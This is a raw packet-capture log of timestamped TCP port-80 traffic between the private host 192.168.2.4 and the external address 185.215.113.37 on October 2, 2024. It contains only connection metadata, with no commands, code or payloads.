Oct 2, 2024 18:19:30.751909018 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751935005 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751946926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751961946 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751982927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.751990080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.751997948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752022028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752059937 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752084970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752106905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752123117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752134085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752135038 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752157927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752180099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752180099 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752194881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752209902 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752213001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752257109 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752259970 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752274036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752289057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752302885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752322912 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752338886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752351999 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752355099 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752382994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752402067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752429008 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752468109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752482891 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752497911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752512932 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752520084 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752563953 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752593994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752609015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752624989 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752639055 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752640009 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752654076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752677917 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752698898 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752712011 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752713919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752728939 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752744913 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752747059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752760887 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.752778053 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.752818108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.809801102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.809815884 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.809830904 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.809853077 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.809855938 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.809868097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.809881926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.809890985 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.809897900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.809926033 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.809937954 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.809973955 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810010910 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810025930 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810040951 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810055017 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810075998 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810106993 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810143948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810158968 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810173988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810185909 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810200930 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810215950 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810230017 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810245037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810260057 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810281038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810302973 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810327053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810340881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810354948 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810369015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810373068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810415030 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810420036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810450077 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810476065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810542107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810554028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810556889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810574055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810584068 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810590029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810628891 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810668945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810672045 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810683966 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810704947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810718060 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810718060 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810733080 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810736895 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810748100 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810762882 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810762882 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810784101 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810821056 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810822964 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810913086 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.810920954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810937881 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810950041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.810976982 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.811016083 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.842401981 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.842432022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.842446089 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.842489004 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.842506886 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.842534065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.842541933 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.842570066 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.842575073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.842595100 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.842627048 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.842648029 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.842672110 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.842685938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.842701912 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.842703104 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.842715979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.842731953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.842740059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.842788935 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.842797041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.842817068 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.842878103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.843084097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843131065 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843135118 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.843153000 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843189001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.843213081 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.843347073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843362093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843377113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843406916 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843422890 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843445063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843456984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.843456984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.843458891 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843473911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843487978 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843499899 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.843502998 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843519926 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843552113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.843552113 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.843575001 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.843585014 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843597889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.843631983 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.843662024 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.843983889 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844000101 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844014883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844039917 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844077110 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844173908 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844196081 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844212055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844227076 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844247103 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844249010 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844261885 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844266891 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844276905 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844286919 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844314098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844319105 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844329119 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844341040 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844351053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844367027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844368935 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844383001 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844391108 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844413996 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844450951 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844485044 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844497919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844511986 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844531059 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844536066 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844546080 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844549894 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844564915 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844568968 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844592094 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844619036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844630003 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844633102 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844660044 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844686031 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844717979 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844732046 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844746113 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844760895 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844774008 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844777107 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844818115 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844851971 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844866991 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844883919 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844896078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.844897985 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844932079 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.844958067 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.845057011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845072031 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845084906 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845101118 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845112085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.845115900 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845130920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845150948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.845175028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.845185041 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845201015 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845216036 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845231056 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845236063 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.845243931 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845261097 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845273018 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.845276117 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845290899 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845305920 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845312119 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.845341921 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.845371008 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.845410109 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845454931 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.845546961 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845562935 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845577955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845592022 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845602036 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.845607042 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845622063 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845638037 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845645905 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.845650911 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.845673084 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.845709085 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.902287006 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902303934 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902318954 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902343035 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902358055 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902371883 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902380943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902390003 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902412891 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.902467012 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.902476072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902491093 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902527094 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902538061 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.902540922 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902555943 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902566910 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.902570963 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902585983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902605057 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.902646065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.902729988 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902745008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902760983 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902775049 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902789116 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.902817011 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902829885 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.902831078 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902846098 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902856112 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.902862072 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902896881 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.902898073 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902915955 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902935028 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.902961016 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902975082 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.902982950 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.902998924 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.903007984 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.903013945 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.903048038 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.903081894 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.903219938 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.903233051 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.903247118 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.903265953 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.903275013 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.903281927 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.903296947 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.903301954 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.903331041 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.903364897 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.903501987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.903517008 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.903532982 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.903544903 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.903558016 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.903599977 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.934756994 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.934806108 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.934822083 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.934827089 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.934849977 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.934879065 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.934911013 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.934926987 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.934941053 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.934957027 CEST	80	49737	185.215.113.37	192.168.2.4
Oct 2, 2024 18:19:30.934968948 CEST	49737	80	192.168.2.4	185.215.113.37
Oct 2, 2024 18:19:30.935005903 CEST	80	49737	185.215.113.37	192.168.2.4
